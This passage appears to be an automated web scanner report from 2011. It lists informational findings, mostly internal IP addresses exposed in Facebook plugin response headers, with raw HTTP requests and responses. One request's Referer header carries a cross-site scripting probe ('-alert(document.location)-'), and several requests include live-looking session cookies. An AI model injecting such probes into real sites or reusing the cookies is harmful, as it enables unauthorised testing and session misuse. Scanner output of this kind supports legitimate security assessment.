Date: Mon, 12 Sep 2011 12:48:55 GMT
Content-Length: 261

<script type="text/javascript">
parent.postMessage("cb=f3f3d9814c&origin=http\u00253A\u00252F\u00252Fwww.digitaldollhouse.com\u00252Ff38d9f2644&relation=parent&transport=postmessage&frame=f1a3027fa8",
...[SNIP]...
14.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=167965409939320&href=http%3A%2F%2Fwww.facebook.com%2Fmtvuk&send=false&layout=button_count&width=100&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.237.115
X-Cnection: close
Date: Mon, 12 Sep 2011 12:50:13 GMT
Content-Length: 23285

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
14.25. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=167965409939320&href=http%3A%2F%2Fwww.facebook.com%2Fmtvuk&send=false&layout=button_count&width=100&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.194.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:05:01 GMT
Content-Length: 23360

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
14.26. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.182.118
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:09 GMT
Content-Length: 13284

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.27. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.48
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:35 GMT
Content-Length: 12828

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.28. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=15713980389&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.173.114
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:55 GMT
Content-Length: 13110

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.29. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.127.52
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:21 GMT
Content-Length: 13287

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.30. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.120.55
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:29 GMT
Content-Length: 12885

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.31. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.12.35
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:17 GMT
Content-Length: 13173

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.32. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:25 GMT
Content-Length: 13240

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.33. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.140.49
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:28 GMT
Content-Length: 13255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.34. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.21.37
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:23 GMT
Content-Length: 12833

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.35. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpopsci&width=347&colorscheme=light&show_faces=true&stream=false&header=false&height=250 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Length: 13693

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.36. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.37.115
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:16 GMT
Content-Length: 12854

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
14.37. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.137.46
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:39 GMT
Content-Length: 12925

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
15. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

15.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.newsinc.com
Path:   /flash/widget_toppicks01ps2.xml

Issue detail

The following credit card number was disclosed in the response:

Request

GET /flash/widget_toppicks01ps2.xml?v=2.7.0 HTTP/1.1
Host: assets.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
x-amz-id-2: oaLS8PC61eD+cFz4bkDLEWAzU//iDNxltZtogqFJFVZKrsXjRjN9HPSjkPz0hO6V
x-amz-request-id: 3B7490D32CC4D063
Date: Mon, 12 Sep 2011 12:49:33 GMT
Cache-Control: max-age=0
Last-Modified: Fri, 20 May 2011 20:02:04 GMT
ETag: "d4fc97c509659b75278236329237887d"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 6957
Server: AmazonS3

<?xml version="1.0"?>
<gui_info>
   <resources>
       <guifile file="widget_hothmb_gui01.swf"/>
       <cssfile file="internal">
           <!--file="internal" & add internalcss element and insert CDATA css-->
           <inter
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
15.2. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The following credit card number was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<img src="http://www.digitaldollhouse.com/sites/all/files/imagecache/snapshot_winner_340/snapshot-bin/472870-1315776274.jpg" alt="My Snapshot" title="My Snapshot" class="imagecache imagecache-snapshot_winner_340" width="340" height="195" />
...[SNIP]...
16. HTML does not specify charset  previous  next
There are 16 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

16.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://67.23.1.124
Path:   /omni/cdcc_mandelbrot_min_2.html

Request

GET /omni/cdcc_mandelbrot_min_2.html HTTP/1.1
Host: 67.23.1.124
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:46:36 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Wed, 29 Jun 2011 17:40:08 GMT
ETag: "500dcb-1d0-4a6dd4685ce00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 464
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mandelbrot Cross-Dom
...[SNIP]...
16.2. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
